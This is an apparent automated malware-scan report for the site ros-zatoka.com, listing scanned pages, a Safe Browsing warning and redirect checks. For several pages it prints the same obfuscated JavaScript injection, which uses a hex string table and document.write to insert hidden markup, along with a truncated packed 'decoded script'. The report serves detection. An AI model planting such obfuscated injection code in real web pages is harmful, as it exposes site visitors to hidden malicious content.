Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ros-zatoka.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.ros-zatoka.com/ | 200 OK Content-Length: 19652 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
| ||
http://www.ros-zatoka.com/engine/classes/js/jquery.js | 200 OK Content-Length: 91556 Content-Type: application/x-javascript | clean |
http://www.ros-zatoka.com/engine/classes/js/jqueryui.js | 200 OK Content-Length: 65247 Content-Type: application/x-javascript | clean |
http://www.ros-zatoka.com/engine/classes/js/dle_js.js | 200 OK Content-Length: 19627 Content-Type: application/x-javascript | clean |
http://www.ros-zatoka.com/kontakty/ | 200 OK Content-Length: 20501 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
| ||
http://www.ros-zatoka.com/o-nas/ | 200 OK Content-Length: 20126 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
| ||
http://www.ros-zatoka.com/nomera/ | 200 OK Content-Length: 6750 Content-Type: text/html | suspicious |
Suspicious code found </span> | ||
http://www.ros-zatoka.com/nomera-i-kategorii/ | 200 OK Content-Length: 5244 Content-Type: text/html | suspicious |
Suspicious code found </span> | ||
http://www.ros-zatoka.com/nomera-ii-kategorii/ | 200 OK Content-Length: 5130 Content-Type: text/html | suspicious |
Suspicious code found </span> | ||
http://www.ros-zatoka.com/bronirovanie/ | 200 OK Content-Length: 5164 Content-Type: text/html | suspicious |
Suspicious code found </span> | ||
http://www.ros-zatoka.com/uslugi/ | 200 OK Content-Length: 20281 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
| ||
http://www.ros-zatoka.com/foto-galereja/ | 200 OK Content-Length: 36354 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
| ||
http://www.ros-zatoka.com/engine/classes/highslide/highslide.js | 200 OK Content-Length: 32986 Content-Type: application/x-javascript | clean |
http://www.ros-zatoka.com/test404page.js | 404 Not Found Content-Length: 19028 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) z = '73706c697421736c696365216c656e6774682166726f6d43686172436f6465217375627374722163686172436f64654174'; _ = ''; for (__ = 0; __ < z.length/2; __++){_ += unescape('%' + z[__*2]+z[__*2+1]);} _ = _[_[0]+_[1]+_[2]+_[3]+_[4]]('!'); function ___(__){__ = __[_[0]]('\x25')[_[1]](-~[]); _I = ''; for (_l = 0; _l < __[_[2]]; _l++) {_I += __[_l][0]+String[_[3]](__[_l][_[4]](1)-__[_l][0][_[5]]());}return _I;} document['\x77\x72\x69\x74\x65'](___('%<165%f216%a206%e133%s229%c160%"138%t232%p170%/94%r215%s226%u231%c200%g204%n211%r211%t227%r160%i215%f213%/165%a196%f211%.145%g208%?163%e203%a214%l224%"66%f216%a206%e199%o225%d201%r175%"82%"66%s231%y229%e162%"153%i205%t220%:106%;91%h205%i208%h220%:106%"96%<107%i207%r211%m210%>62')); Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('38(2U(p,a,c,k,e,d){e=2U(c){2V(c<a?\'\':e(39(c/a)))+((c=c%a)>35?2W.31(c+29):c.34(36))};2X(!\'\'.2Y(/^/,2W)){2Z(c--){d[e(c)]=k[c]||e(c)}k=[2U(e){2V d[e]}];e=2U(){2V\'\\\\w+\'};c=1};2Z(c--){2X(k[c]){p=p.2Y(32 33(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}2V p}(\'1D(1k(p,a,c,k,e, Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ros-zatoka.com
Result:
GET / HTTP/1.1
Host: ros-zatoka.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: ros-zatoka.com
Referer: http://www.google.com/search?q=ros-zatoka.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ros-zatoka.com
Referer: http://www.google.com/search?q=ros-zatoka.com
Result:
The result is similar to the first query. There are no suspicious redirects found.